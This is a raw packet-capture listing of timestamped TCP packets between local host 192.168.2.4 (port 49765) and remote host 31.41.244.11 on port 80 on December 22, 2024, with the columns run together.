                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.354002953 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.354043007 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.354079008 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.425968885 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.426047087 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.426065922 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.426120043 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.428308010 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.428378105 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.428394079 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.428447008 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.432914972 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.432974100 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.432981968 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.433036089 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.437614918 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.437680960 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.438046932 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.438105106 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.442279100 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.442336082 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.442514896 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.442574978 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.446968079 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.447030067 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.447179079 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.447235107 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.451651096 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.451706886 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.451714993 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.451762915 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.456293106 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.456389904 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.456397057 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.456449986 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.460978985 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.461036921 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.461102962 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.461160898 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.465647936 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.465712070 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.465744019 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.465807915 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.470312119 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.470383883 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.470457077 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.470519066 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.474965096 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.475024939 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.475117922 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.475174904 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.479650021 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.479751110 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.479860067 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.479916096 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.484357119 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.484416962 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.484452009 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.484515905 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.488019943 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.488073111 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.488075018 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.488132000 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.491691113 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.491728067 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.491751909 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.491801023 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.495359898 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.495415926 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.495434046 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.495464087 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.498931885 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.499008894 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.499051094 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.499125957 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.502620935 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.502684116 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.502734900 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.502791882 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.506252050 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.506305933 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.506372929 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.506426096 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.509902000 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.509959936 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.510031939 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.510088921 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.513555050 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.513657093 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.618257999 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.618356943 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.618443966 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.618484974 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.619474888 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.619535923 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.619544029 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.619594097 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.622672081 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.622726917 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.622739077 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.622780085 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.625336885 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.625396967 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.625485897 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.625540018 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.628112078 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.628168106 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.628189087 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.628242016 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.630923986 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.630985022 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.631074905 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.631154060 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.633677006 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.633737087 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.633810997 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.633865118 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.636332989 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.636384964 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.636459112 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.636512041 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.638946056 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.639008999 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.639143944 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.639209032 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.641562939 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.641623974 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.641689062 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.641803026 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.644176006 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.644247055 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.644308090 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.644362926 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.646775007 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.646827936 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.646889925 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.646941900 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.649389029 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.649450064 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.649502039 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.649554968 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.651983976 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.652105093 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.652112007 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.652158976 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.654591084 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.654647112 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.654720068 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.654772997 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.657181978 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.657241106 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.657298088 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.657351971 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.659790039 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.659858942 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.659903049 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.659955978 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.662381887 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.662451982 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.662519932 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.662585974 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.664974928 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.665033102 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.665107965 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.665162086 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.667603970 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.667659998 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.667705059 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.667772055 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.670197964 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.670254946 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.670329094 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.670388937 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.672782898 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.672841072 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.672946930 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.673002005 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.675403118 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.675472021 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.675529003 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.675582886 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.678003073 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.678073883 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.678169012 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.678245068 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.680636883 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.680710077 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.680799961 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.680856943 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.683222055 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.683347940 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.683363914 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.683417082 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.685831070 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.685894966 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.685960054 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.686007023 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.688447952 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.688513041 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.688541889 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.688590050 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.691046000 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.691107988 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.691159964 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.691210985 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.693655968 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.693743944 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.693763971 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.693819046 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.696245909 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.696316004 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.696371078 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.696424961 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.698865891 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.698930979 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.699007034 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.699057102 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.701492071 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.701558113 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.701598883 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.701666117 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.704063892 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.704165936 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.704294920 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.704356909 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.706651926 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.706710100 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.706804037 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.706861973 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.810067892 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.810148001 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.810266972 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.810326099 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.811111927 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.811170101 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.811249971 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.811306000 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.813330889 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.813388109 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.813441038 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.813504934 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.815381050 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.815437078 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.815495968 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.815552950 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.817555904 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.817670107 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.817675114 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.817734003 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.819699049 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.819756031 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.819816113 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.819884062 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.821806908 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.821871996 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.821928978 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.821985006 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.823929071 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.823986053 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.824029922 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.824084044 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.825905085 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.825962067 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.826016903 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.826083899 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.827923059 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.827986956 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.828038931 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.828100920 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.829922915 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.830001116 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:12.830046892 CET804976531.41.244.11192.168.2.4
